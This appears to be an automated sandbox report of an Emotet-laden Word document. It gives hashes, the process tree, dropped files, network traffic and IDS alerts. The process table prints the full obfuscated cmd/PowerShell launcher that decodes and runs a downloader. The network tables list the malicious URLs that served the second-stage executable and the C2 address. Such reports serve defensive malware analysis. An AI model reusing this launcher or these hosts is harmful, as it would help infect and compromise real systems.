File name: | 0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e |
Full analysis: | https://app.any.run/tasks/01ba75ba-2627-47e5-ba34-1b1c781c50ef |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 12:14:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Luke-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 10:48:00 2018, Last Saved Time/Date: Tue Nov 13 10:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | DC67B408334690FB81B8B4AAFCEDD000 |
SHA1: | E3AE09C744D827176E31F2C5BBCBE4AC0D13093A |
SHA256: | 0A6D1812559D81C236C495EF207E3C34949312467C424D31720A857F2495E67E |
SSDEEP: | 1536:bjG+ocn1kp59gxBK85fBt+a9kJ38F7lE+753uZ4JnLJ38F7lr1wXQt39C1OXUZ22:nu41k/W486J38F7lE+753uZ4JnLJ38FI |
Extension | Type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:13 10:48:00 |
CreateDate: | 2018:11:13 10:48:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Luke-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1716 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3868 | CMD /c c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2712 | c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | c:\WInDowS\sySteM32\cmd.exe | — | CMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2292 | poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( & ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2692 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | — | powershell.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
3840 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | — | 960.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
1812 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | 960.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
1464 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe |
User: admin Company: Micr Integrity Level: MEDIUM Version: 6.2.9200. | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
1716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR96DC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q84N7XXIOCVOI9U8MKT1.temp | — | |
MD5:— | SHA256:— | |||
3840 | 960.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:712B603FFF614230B27D6B2B15F4440E | SHA256:9155A2F84C7A36F27DEAA0A3F63BBCB426ACE329E10EDCBE7D9A8AA8A20CB133 | |||
2292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\960.exe | executable | |
MD5:712B603FFF614230B27D6B2B15F4440E | SHA256:9155A2F84C7A36F27DEAA0A3F63BBCB426ACE329E10EDCBE7D9A8AA8A20CB133 | |||
1716 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D01CA1EBAE094E9B94B62FE2E8E6B18C | SHA256:64C23A325019296C94D75B4C8C29C932798431B8B257A13D0E63636B3DE68C04 | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da256.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
1716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc | pgc | |
MD5:BFEEFB5318B729192181F914BC04372E | SHA256:92E49589FE220E3B319E89C4F492676C77224BDEEF6F8137AE4F2932B28DE0BC | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1464 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
2292 | powershell.exe | GET | 200 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX/ | US | executable | 448 Kb | malicious |
2292 | powershell.exe | GET | 301 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX | US | html | 617 b | malicious |
2292 | powershell.exe | GET | 401 | 31.220.125.13:80 | http://www.bluepuma.at/97Hf4F | DE | html | 381 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2292 | powershell.exe | 31.220.125.13:80 | www.bluepuma.at | Mittwald CM Service GmbH und Co.KG | DE | malicious |
1464 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
2292 | powershell.exe | 72.9.110.98:80 | www.naimalsadi.com | Access Integrated Technologies, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.bluepuma.at | 31.220.125.13 | malicious |
www.naimalsadi.com | 72.9.110.98 | malicious |
PID | Process | Class | Message |
---|---|---|---|
2292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2292 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2292 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2292 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |